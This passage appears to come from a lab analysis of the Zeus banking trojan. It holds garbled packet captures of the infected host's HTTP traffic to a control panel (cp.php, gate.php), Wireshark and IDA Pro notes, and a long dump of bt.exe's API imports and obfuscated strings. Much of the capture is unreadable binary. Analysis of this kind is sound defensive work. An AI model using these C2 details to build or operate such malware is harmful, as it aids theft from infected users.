¨ïÛéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µ˜D7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:00 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆðˆ’RÐQoL{ „ q1Q"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•


¸eqcê<·1ÑàqHú§µ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µûG7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:07 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð¯!´6ˆèŒeÁr¸ÇÒä"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•


¸eqcê<·1ÑàqHý§µ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´/k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µIC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:14 GMT

Server: Apache



Content-Length: 0

Connection: close


dellwebadmin-2:


Accept: */*


Host: xxx.com

Content-Length: 343


Pragma: no-cache



¸eqcê<·1ÑàqHjÿ‹*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f



¢¹




Date: Mon, 25 Apr 2011 11:28:30 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆðJmI¸Ò\®

¤R?pB·zÉ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ

¸eqcê<·1ÓàqH-ſµ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´d’i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µ'C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:35 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 343


Pragma: no-cache



¸eqcê<·1ÑàqHjÿ‹*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f



¢¹




Date: Mon, 25 Apr 2011 11:28:35 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host:xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆð-jé•×9ÁY Á)íü0T"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ

¸eqcê<·1ÑàqHſµ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´À»i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µaC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:41 GMT

Server: Apache



Content-Length: 0





Accept: */*


Host: xxx.com

Content-Length: 255


Pragma: no-cache

(~ÿÊ5žuÆðæµª&>ˆ~}pÖëp"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•


¸eqcê<·1ÑàqHſµ*Ï¨ýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´aCh%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûìkF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1Ð´>µ3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:47 GMT

Server: Apache



Content-Length: 0

Connection: close


get:

GET /ucf/cp.php?m=login HTTP/1.0


Host: xxx.com

Pragma: no-cache

HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:29:53 GMT

Server: Apache


Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0

Pragma: no-cache

Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf

Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf

Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf


Connection: close

Content-Type: application/xhtml+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title>login</title>

<meta http-equiv="Content-Style-Type" content="text/css" />

<meta http-equiv="Content-Script-Type" content="text/javascript" />

<link rel="stylesheet" href="theme/style.css" type="text/css" />

</head>

<body>

<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"

style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"

valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input

type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td

align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"

style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input

type="checkbox" name="remember" value="1" /> Remember (MD5

cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"

value="Submit" /></td></tr></table></form>

</body>

</html>

sftsrv:

GET /ucf/cp.php?m=login HTTP/1.0


Host: xxx.com

Pragma: no-cache

HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:31:14 GMT

Server: Apache


Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0

Pragma: no-cache

Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf

Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf

Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf


Connection: close

Content-Type: application/xhtml+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title>login</title>

<meta http-equiv="Content-Style-Type" content="text/css" />

<meta http-equiv="Content-Script-Type" content="text/javascript" />

<link rel="stylesheet" href="theme/style.css" type="text/css" />

</head>

<body>

<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"

style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"

valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input

type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td

align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"

style="width:200px" /></td></tr><tr><td> </td><td align="left" colspan="1"><input

type="checkbox" name="remember" value="1" /> Remember (MD5

cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"

value="Submit" /></td></tr></table></form>

</body>

</html>

From Wireshark we learned that there is a client server relationship among the infected

host and the web server. We see a lot of port types being used to communicate back and forth.

There is no clear text found for the payloads to show us what the host is asking or giving to

the web server. It looks like the web server is sending the host xml files. We see the main files

are the gate.phpŗ and the Ŗcp.php.ŗ

IDA Pro 5 All the code to make this Zeus run correctly relies on the Ŗzse.exeŗ and the Ŗbt.exeŗ

executables. We can take a look at what is happening at the machine level and inspect the

comments from the code to see some hints in what the program is suppose to do.

Both executables were analyzed with IDA Pro 5 to find out the inputs, outputs, text

comments, the type of complier used to build the program and all the dependencies in the

code. The flow diagram is very complex for the Ŗzse.exeŗ executable and would take more

than 6 months to trace through. The Ŗbt.exeŗ executable flow diagram is more manageable

however would also take an exhausted amount of time to conquer. For this experiment the

focused was just to find out the variables and functions and make educated assumptions based

on those findings.

bt.exe

The type of compiler used to build the program is vc6win Visual C++ v6.

F (dark blue) - regular function:

start 0040D70F

A (dark green) - ascii string: aNpnitp2s_42Ucn 004010A0 a5hg5AD_fnvf9 00401A8C

aYx5RYaQlgy 00401B28

aFF2ms4dYIO 00401C1C aQXLAd?fnXdqvdA 00401C44

aHaM_ 00401C63

aGn4v89Tnpcq9ki 00402C0C aUhxp 0040360C

aEglEs?AkvucpLa 004037B1

aCV_bKv2a8p? 00403880 aHrnH8vD3GIuCdx 00403B30

aGsiNabQR6xE8yv 00403B78

a5cs8LFo3nymhn_ 00403BA1 a?fx9a65HEb 0040445C

I (purple) - imported name:

BuildTrusteeWithNameW 00413000

GetTrusteeNameA 00413004 BuildImpersonateTrusteeA 00413008

GetNamedSecurityInfoW 0041300C

CryptGetDefaultProviderA 00413010 CryptDuplicateKey 00413014

RegSetValueExW 00413018

DeregisterEventSource 0041301C BuildSecurityDescriptorA 00413020

InitiateSystemShutdownW 00413024

RegQueryMultipleValuesW 00413028 LookupAccountNameW 0041302C

RegSetKeySecurity 00413030

RegEnumValueW 00413034

SetServiceObjectSecurity 00413038

RegisterEventSourceA 0041303C

SetEntriesInAuditListW 00413040 BuildTrusteeWithSidW 00413044

RegLoadKeyW 00413048

GetOldestEventLogRecord 0041304C LookupAccountSidA 00413050

GetTrusteeTypeW 00413054

LookupPrivilegeNameA 00413058 CryptHashData 0041305C

ImpersonateNamedPipeClient 00413060

ObjectOpenAuditAlarmW 00413064 RegEnumKeyExA 00413068

BuildSecurityDescriptorW 0041306C

LookupPrivilegeValueA 00413070 DeleteAce 00413074

OpenProcessToken 00413078

DeleteService 0041307C CryptDecrypt 00413080

CreateProcessAsUserW 00413084

RevertToSelf 00413088 IsValidSecurityDescriptor 0041308C

RegReplaceKeyW 00413090

CryptAcquireContextW 00413094 LookupAccountSidW 00413098

SetEntriesInAccessListW 0041309C

RegDeleteValueA 004130A0 RegQueryValueExA 004130A4

GetSidIdentifierAuthority 004130A8

CryptGetHashParam 004130AC PrivilegedServiceAuditAlarmA 004130B0

BuildImpersonateExplicitAccessWithNameA 004130B4

GetLengthSid 004130B8

CryptImportKey 004130BC AllocateAndInitializeSid 004130C0

BuildImpersonateExplicitAccessWithNameW

004130C4

CryptSignHashW 004130C8

GetServiceDisplayNameA 004130CC

EnumDependentServicesA 004130D0 CryptReleaseContext 004130D4

GetExplicitEntriesFromAclW 004130D8

GetUserNameW 004130DC CryptEnumProvidersW 004130E0

FindFirstFreeAce 004130E4

CloseServiceHandle 004130E8 GetCurrentHwProfileW 004130EC

CancelOverlappedAccess 004130F0

StartServiceA 004130F4

GetKeyNameTextA 00413328

SetWindowPos 0041332C RegisterWindowMessageW 00413330

UnionRect 00413334

SetCaretBlinkTime 00413338 DestroyAcceleratorTable 0041333C

ChangeDisplaySettingsW 00413340

LoadImageA 00413344 SetMenuItemBitmaps 00413348

DdeUnaccessData 0041334C

DefWindowProcW 00413350 CreateIconFromResource 00413354

EditWndProc 00413358

ChangeMenuW 0041335C

DrawEdge 00413360

GetDlgItem 00413364

InternalGetWindowText 00413368 ChangeDisplaySettingsA 0041336C

InsertMenuW 00413370

SetMenuInfo 00413374 DdeSetUserHandle 00413378

GetMessageW 0041337C

ModifyMenuW 00413380 MsgWaitForMultipleObjectsEx 00413384

DrawAnimatedRects 00413388

GetUserObjectSecurity 0041338C GetMenuCheckMarkDimensions 00413390

GetMenu 00413394

DestroyCursor 00413398 IsDlgButtonChecked 0041339C

GetCaretBlinkTime 004133A0

GetShellWindow 004133A4 GetClipboardOwner 004133A8

CallWindowProcA 004133AC

GetWindowPlacement 004133B0 TabbedTextOutA 004133B4

LoadKeyboardLayoutW 004133B8

IsZoomed 004133BC CreateAcceleratorTableW 004133C0

FillRect 004133C4

RealGetWindowClass 004133C8 ToUnicodeEx 004133CC

OpenWindowStationW 004133D0

IsCharUpperA 004133D4 InvalidateRect 004133D8

GetMenuStringW 004133DC IsDialogMessageW 004133E0

ReleaseCapture 004133E4

GetSystemMenu 004133E8 SetCapture 004133EC

GrayStringA 004133F0

SwitchDesktop 004133F4

SetRect 004133F8

GetUpdateRgn 004133FC

GetDlgItemInt 00413400 LoadMenuA 00413404

CoCreateInstance 0041340C

CoRegisterMessageFilter 00413410 OleCreateLink 00413414

OleCreateEx 00413418

OleLoad 0041341C GetConvertStg 00413420

CoQueryReleaseObject 00413424

CreateDataAdviseHolder 00413428

PathFindExtensionA 00413658

SHRegGetUSValueW 0041365C UrlGetPartA 00413660

StrToIntA 00413664

StrCSpnW 00413668 PathMakeSystemFolderA 0041366C

PathFileExistsW 00413670

PathGetCharTypeA 00413674 StrRStrIW 00413678

UrlCombineW 0041367C

SHRegCreateUSKeyW 00413680 PathGetCharTypeW 00413684

PathSetDlgItemPathW 00413688

UrlCanonicalizeA 0041368C

PathIsFileSpecW 00413690

PathIsSystemFolderA 00413694

PathBuildRootW 00413698 SHRegDeleteEmptyUSKeyA 0041369C

ChrCmpIW 004136A0

SHRegGetBoolUSValueA 004136A4 PathFindFileNameA 004136A8

SHIsLowMemoryMachine 004136AC

UrlUnescapeA 004136B0 SHRegDuplicateHKey 004136B4

SHDeleteKeyW 004136B8

StrStrIW 004136BC UrlCanonicalizeW 004136C0

SHEnumKeyExW 004136C4

PathCompactPathA 004136C8 PathSkipRootA 004136CC

PathUnmakeSystemFolderW 004136D0

StrToIntExW 004136D4 PathQuoteSpacesA 004136D8

PathSearchAndQualifyA 004136DC

SHQueryValueExW 004136E0 PathRemoveArgsW 004136E4

PathFindNextComponentW 004136E8

PathIsUNCA 004136EC PathIsContentTypeA 004136F0

StrRetToBufW 004136F4

PathFindFileNameW 004136F8 SHRegDeleteUSValueA 004136FC

SHDeleteValueW 00413700

StrCSpnIA 00413704 PathCommonPrefixW 00413708

PathIsPrefixW 0041370C UrlIsNoHistoryW 00413710

SHCopyKeyW 00413714

SHDeleteKeyA 00413718 SHRegSetUSValueW 0041371C

PathRelativePathToA 00413720

PathMakePrettyW 00413724

PathAppendA 00413728

UrlIsNoHistoryA 0041372C

EnumCalendarInfoExA 00413734 Module32Next 00413738

EnumSystemLocalesW 0041373C

Heap32ListNext 00413740 GetUserDefaultLCID 00413744

EnumTimeFormatsA 00413748

lstrcmpiA 0041374C GetQueuedCompletionStatus 00413750

FreeLibrary 00413754

EnumSystemLocalesA 00413758

RegCloseKey 004130F8

RegQueryValueA 004130FC CryptVerifySignatureW 00413100

AdjustTokenPrivileges 00413104

QueryServiceStatus 00413108 RegConnectRegistryA 0041310C

GetTokenInformation 00413110

GetAccessPermissionsForObjectW 00413114 RegQueryValueW 00413118

AccessCheckAndAuditAlarmW 0041311C

SetSecurityDescriptorSacl 00413120 AreAnyAccessesGranted 00413124.

ObjectCloseAuditAlarmA 00413128

QueryServiceConfigA 0041312C ClearEventLogW 00413130

RegUnLoadKeyA 00413134

LookupPrivilegeNameW 00413138 GetSecurityInfo 0041313C

RegEnumKeyExW 00413140

ObjectPrivilegeAuditAlarmW 00413144

GetTrusteeTypeA 00413148

RegOpenKeyExW 0041314C

RegCreateKeyA 00413150 IsTextUnicode 00413154

OpenEventLogW 00413158

CryptEnumProviderTypesW 0041315C RegRestoreKeyW 00413160

CryptGetProvParam 00413164

ChangeServiceConfigA 00413168 RegSaveKeyA 0041316C

BuildExplicitAccessWithNameW 00413170

GetSecurityDescriptorSacl 00413174 RegLoadKeyA 00413178

GetMultipleTrusteeA 0041317C

AddAccessAllowedAce 00413180 SetAclInformation 00413184

ControlService 00413188

GetSecurityInfoExW 0041318C RegRestoreKeyA 00413190

ObjectOpenAuditAlarmA 00413194

CopySid 00413198 OpenSCManagerA 0041319C

RegQueryMultipleValuesA 004131A0

OpenThreadToken 004131A4 LogonUserW 004131A8

CryptDestroyHash 004131AC

AbortSystemShutdownW 004131B0 GetAclInformation 004131B4

CreateServiceW 004131B8

CryptGenKey 004131BC LookupSecurityDescriptorPartsW 004131C0

ConvertAccessToSecurityDescriptorA 004131C4 SetEntriesInAccessListA 004131C8

AbortSystemShutdownA 004131CC

SetEntriesInAclW 004131D0 GetFileSecurityA 004131D4

OpenEventLogA 004131D8

CryptSetHashParam 004131DC

CryptSetProviderExA 004131E0

QueryServiceConfigW 004131E4

CryptSetProviderExW 004131E8 OpenBackupEventLogW 004131EC

SendMessageTimeoutW 004131F4

TileChildWindows 004131F8 EndTask 004131FC

IsDialogMessageA 00413200

DdeQueryNextServer 00413204 FlashWindowEx 00413208

GetKeyboardLayoutNameA 0041320C

DdeFreeDataHandle 00413210

CoGetInterfaceAndReleaseStream 0041342C

WriteClassStm 00413430 StgGetIFillLockBytesOnFile 00413434

OleBuildVersion 00413438

OleRegEnumFormatEtc 0041343C GetRunningObjectTable 00413440

UtGetDvtd32Info 00413444

OleCreateStaticFromData 00413448 OleCreateFromFile 0041344C

OleDoAutoConvert 00413450

OpenOrCreateStream 00413454 OleNoteObjectVisible 00413458

CreateAntiMoniker 0041345C

OleMetafilePictFromIconAndLabel 00413460 CoUnmarshalInterface 00413464

OleCreateEmbeddingHelper 00413468

CoRegisterClassObject 0041346C FreePropVariantArray 00413470

OleSetAutoConvert 00413474

OleTranslateAccelerator 00413478

OleSaveToStream 0041347C

CoGetTreatAsClass 00413480

CoRevertToSelf 00413484 CoInitializeEx 00413488

OleIsCurrentClipboard 0041348C

OleConvertIStorageToOLESTREAMEx 00413490

CoGetCurrentLogicalThreadId 00413494

CreateItemMoniker 00413498 CoGetMalloc 0041349C

WriteClassStg 004134A0

ReadStringStream 004134A4 CreateGenericComposite 004134A8

PropVariantCopy 004134AC

StgOpenStorageEx 004134B0 OleSave 004134B4

IsAccelerator 004134B8

BindMoniker 004134BC CoGetCallContext 004134C0

CoFreeUnusedLibraries 004134C4

StgOpenStorage 004134C8 UpdateDCOMSettings 004134CC

CoGetMarshalSizeMax 004134D0

OleGetIconOfFile 004134D4 StgOpenStorageOnILockBytes 004134D8

CoQueryProxyBlanket 004134DC

UtConvertDvtd16toDvtd32 004134E0 CoQueryAuthenticationServices 004134E4

OleSetClipboard 004134E8

DoDragDrop 004134EC IsEqualGUID 004134F0

CoReleaseMarshalData 004134F4 OleCreate 004134F8

CoQueryClientBlanket 004134FC

ReadClassStm 00413500 ReleaseStgMedium 00413504

CreateFileMoniker 00413508

OleSetMenuDescriptor 0041350C

CreatePointerMoniker 00413510

CoTreatAsClass 00413514

CoFreeAllLibraries 00413518 StgGetIFillLockBytesOnILockBytes 0041351C

CreateILockBytesOnHGlobal 00413520

CreateObjrefMoniker 00413524 CreateBindCtx 00413528

StringFromIID 0041352C

CoInitializeSecurity 00413530 CoBuildVersion 00413534

WriteStringStream 00413538

CoCreateFreeThreadedMarshaler 0041353C

Thread32First 0041375C

GetNamedPipeInfo 00413760 GlobalUnlock 00413764

FreeEnvironmentStringsA 00413768

GlobalFree 0041376C GetCurrentThread 00413770

PeekConsoleInputA 00413774

FindResourceExA 00413778 VirtualProtect 0041377C

OpenProcess 00413780

GetSystemDefaultLangID 00413784 GetEnvironmentStringsA 00413788

VirtualAlloc 0041378C

HeapLock 00413790 ConvertDefaultLocale 00413794

SetVolumeLabelW 00413798

SizeofResource 0041379C SetFileApisToOEM 004137A0

FileTimeToLocalFileTime 004137A4

GetFullPathNameW 004137A8

GetDiskFreeSpaceW 004137AC

SetSystemTime 004137B0

EnumDateFormatsExW 004137B4 CallNamedPipeA 004137B8

FindCloseChangeNotification 004137BC

SetEvent 004137C0 SetProcessPriorityBoost 004137C4

IsBadWritePtr 004137C8

TerminateThread 004137CC EnumResourceTypesW 004137D0

GetPrivateProfileIntW 004137D4

OpenFileMappingA 004137D8 CopyFileA 004137DC

lstrcpyn 004137E0

ReadConsoleW 004137E4 PeekNamedPipe 004137E8

CreateNamedPipeW 004137EC

CreateDirectoryExA 004137F0 SetThreadLocale 004137F4

ClearCommBreak 004137F8

SetStdHandle 004137FC GetNumberOfConsoleMouseButtons 00413800

GetFileAttributesExW 00413804

WriteConsoleOutputW 00413808 FlushViewOfFile 0041380C

PulseEvent 00413810

GetLocalTime 00413814 GetWindowsDirectoryA 00413818

SetCommConfig 0041381C

GetFileAttributesW 00413820 GetConsoleTitleA 00413824

SetProcessAffinityMask 00413828 GetSystemInfo 0041382C

FlushInstructionCache 00413830

SwitchToThread 00413834 GetCurrentProcessId 00413838

DosDateTimeToFileTime 0041383C

EscapeCommFunction 00413840

HeapDestroy 00413844

SetCurrentDirectoryA 00413848

GetConsoleScreenBufferInfo 0041384C FindFirstFileA 00413850

CreateNamedPipeA 00413854

GetThreadLocale 00413858 GetTempFileNameA 0041385C

GlobalUnWire 00413860

SwitchToFiber 00413864 LocalFileTimeToFileTime 00413868

CreateTapePartition 0041386C

GlobalAddAtomW 00413870

SetThreadDesktop 00413214

GetInputState 00413218 SetKeyboardState 0041321C

SetMenuItemInfoW 00413220

GetMenuItemID 00413224 GrayStringW 00413228

EmptyClipboard 0041322C

CreatePopupMenu 00413230 LoadStringW 00413234

CallMsgFilterA 00413238

GetActiveWindow 0041323C RegisterHotKey 00413240

DialogBoxParamA 00413244

ExcludeUpdateRgn 00413248 GetAncestor 0041324C

GetSysColor 00413250

GetDlgCtrlID 00413254 DdeFreeStringHandle 00413258

LoadStringA 0041325C

MonitorFromWindow 00413260

SetDeskWallpaper 00413264

DrawFrame 00413268

RegisterWindowMessageA 0041326C GetMenuItemRect 00413270

LoadMenuIndirectW 00413274

EnumDisplaySettingsExW 00413278 BeginDeferWindowPos 0041327C

OemToCharW 00413280

GetMonitorInfoW 00413284 NotifyWinEvent 00413288

GetKeyState 0041328C

RemoveMenu 00413290 SetDlgItemTextW 00413294

GetDesktopWindow 00413298

GetMessageTime 0041329C GetClipCursor 004132A0

UpdateWindow 004132A4

GetPriorityClipboardFormat 004132A8 DrawFocusRect 004132AC

DragDetect 004132B0

GetUpdateRect 004132B4 GetCursor 004132B8

SetLastErrorEx 004132BC

LoadBitmapA 004132C0 CharLowerA 004132C4

SetMenuDefaultItem 004132C8

DdeCreateStringHandleW 004132CC GetDialogBaseUnits 004132D0

WindowFromDC 004132D4

GetAltTabInfo 004132D8 GetMenuState 004132DC

DdeClientTransaction 004132E0 FindWindowW 004132E4

CreateWindowExA 004132E8

EnumDisplaySettingsA 004132EC DdeInitializeA 004132F0

EnumPropsExW 004132F4

OemToCharBuffW 004132F8

SetWindowsHookExW 004132FC

UnhookWindowsHookEx 00413300

SetMenuItemInfoA 00413304 WinHelpW 00413308

GetKeyboardLayout 0041330C

SetClipboardViewer 00413310 GetNextDlgGroupItem 00413314

ChildWindowFromPoint 00413318

EndPaint 0041331C EndMenu 00413320

ValidateRgn 00413324

RegisterDragDrop 00413540

OleCreateLinkToFile 00413544 StgCreateStorageEx 00413548

CoGetPSClsid 0041354C

OleCreateLinkEx 00413550 OleRegGetUserType 00413554

OleCreateLinkFromDataEx 00413558

CoRegisterChannelHook 0041355C OleRegGetMiscStatus 00413560

CreateOleAdviseHolder 00413564

CoRegisterSurrogate 00413568 OleCreateFromDataEx 0041356C

CoDosDateTimeToFileTime 00413570

PropVariantClear 00413574 ReadClassStg 00413578

StgOpenAsyncDocfileOnIFillLockBytes

0041357C OleCreateDefaultHandler 00413580

OleCreateMenuDescriptor 00413584

PathRemoveBlanksW 0041358C

UrlCompareA 00413590

PathFindOnPathA 00413594

SHAutoComplete 00413598 UrlGetLocationW 0041359C

PathIsRelativeW 004135A0

SHRegWriteUSValueW 004135A4 PathIsContentTypeW 004135A8

StrToIntW 004135AC

PathIsSameRootW 004135B0 SHRegQueryInfoUSKeyW 004135B4

SHRegGetUSValueA 004135B8

SHDeleteEmptyKeyW 004135BC StrCatW 004135C0

PathIsUNCW 004

ColorHLSToRGB 004135C8 PathStripPathW 004135CC

HashData 004135D0

StrChrW 004135D4 SHRegCloseUSKey 004135D8

StrDupA 004135DC

UrlGetPartW 004135E0 SHEnumValueA 004135E4

SHSetValueA 004135E8

PathMakeSystemFolderW 004135EC SHSkipJunction 004135F0

PathFindSuffixArrayW 004135F4

PathIsURLA 004135F8 PathGetDriveNumberA 004135FC

SHCopyKeyA 00413600

PathRenameExtensionA 00413604 StrNCatA 00413608

PathFileExistsA 0041360C StrPBrkA 00413610

PathCombineA 00413614

PathCompactPathW 00413618 PathRemoveArgsA 0041361C

SHRegQueryInfoUSKeyA 00413620

StrToIntExA 00413624

StrStrW 00413628

PathFindSuffixArrayA 0041362C

SHStrDupW 00413630 StrRChrIW 00413634

PathCanonicalizeA 00413638

StrRetToBufA 0041363C StrCmpIW 00413640

SHRegSetUSValueA 00413644

SHRegOpenUSKeyW 00413648 SHRegWriteUSValueA 0041364C

StrRetToStrA 00413650

UrlHashA 00413654

WaitForSingleObject 00413874

CreateMutexA 00413878 GetShortPathNameW 0041387C

FoldStringW 00413880

CompareStringA 00413884 ReadFile 00413888

FreeLibraryAndExitThread 0041388C

CompareFileTime 00413890 GetNamedPipeHandleStateA 00413894

GetUserDefaultLangID 00413898

SetDefaultCommConfigA 0041389C GetModuleHandleA 004138A0

GetSystemTime 004138A4

GetVolumeInformationW 004138A8 GetLongPathNameA 004138AC

Process32Next 004138B0

SetFileApisToANSI 004138B4 FlushFileBuffers 004138B8

GetSystemDirectoryW 004138BC

GetCommModemStatus 004138C0

GlobalSize 004138C4

SetFileAttributesA 004138C8

SetThreadPriority 004138CC CancelIo 004138D0

EnumCalendarInfoA 004138D4

TlsFree 004138D8 QueryPerformanceCounter 004138DC

GetCurrentDirectoryW 004138E0

WriteFileGather 004138E4 DefineDosDeviceW 004138E8

SetDefaultCommConfigW 004138EC

GetDevicePowerState 004138F0 SetPriorityClass 004138F4

GetPrivateProfileStringA 004138F8

GetNumberOfConsoleInputEvents 004138FC ReadDirectoryChangesW 00413900

EndUpdateResourceA 00413904

IsDBCSLeadByteEx 00413908 OpenMutexA 0041390C

SetTimeZoneInformation 00413910

lstrlen 00413914 CreateThread 00413918

CreateRemoteThread 0041391C

CompareStringW 00413920 SetProcessShutdownParameters 00413924

Toolhelp32ReadProcessMemory 00413928

GetPrivateProfileStructW 0041392C GetProcessHeaps 00413930

GetDateFormatW 00413934

SetTapeParameters 00413938 SetConsoleActiveScreenBuffer 0041393C

OpenMutexW 00413940 IsSystemResumeAutomatic 00413944

SetTapePosition 00413948

EraseTape 0041394C PostQueuedCompletionStatus 00413950

LocalFree 00413954

GetThreadPriority 00413958

FillConsoleOutputCharacterW 0041395C

lstrcmp 00413960

WaitForSingleObjectEx 00413964 GetComputerNameW 00413968

GetThreadTimes 0041396C

EnumCalendarInfoW 00413970 BackupWrite 00413974

SuspendThread 00413978

Comment Strings:

.text:004010A0 00000015 C nPniTP2S.~4-2$Ucnn-G

.text:00401A8C 00000010 C 5hG5À$d$_fnVF9

.text:00401B28 00000011 C Yx>5;R[¦YA/<QlGy

.text:00401C1C 00000012 C >F;F2mS4d+Y¦[\\i(o

.text:00401C44 0000001F C Q)+X\"½[ad?Fn`+XdQVD-(Âd>x:2ì

.text:00401C63 00000006 C ha[m_

.text:00402C0C 00000023 C Gn)4V8\\9#TnPcQ~(9kiF[#F:fF$^Q//#<5

.text:0040360C 00000005 C UhxP

.text:004037B1 0000001F C \\eGl#eS?)AkVUûP\"½a2>_5on.;RQ]x

.text:00403880 00000016 C c^+;V-<#_b^kV~2a-8P?/

.text:00403B30 0000001C C hRn\"#h8V$D3`G[iU\"cdXT!V`Rna

.text:00403B78 00000017 C GSi+nab(Q(R>6x)e8yVnU5

.text:00403BA1 00000021 C 5ûS8-½<<fo3nYmhn`-_9-h`4`V$i]Y.o

.text:0040445C 00000012 C ?Fx<9A6#5<h);<eb$

.rdata:00413980 0000000A C Xz!7j=D\aZf

.rdata:00413994 00000009 C d]5\r RP.h

.rdata:004139BD 00000008 C HhX<APc=

.rdata:004139C8 0000000B C jVX}pBgCO\t

.rdata:004139D5 00000009 C 7MGt_jXSZ

.rdata:004139DF 00000009 C aXb\"\x1B%jCD

.rdata:004139F3 00000007 C Z.0H!/V

.rdata:004139FB 00000009 C ~T<\x1B\\\tZ\x1Br

.rdata:00413A05 00000009 C -Y]%J()\vL

.rdata:00413A10 00000010 C T\n\b@@VecKiDW|Y\v\t

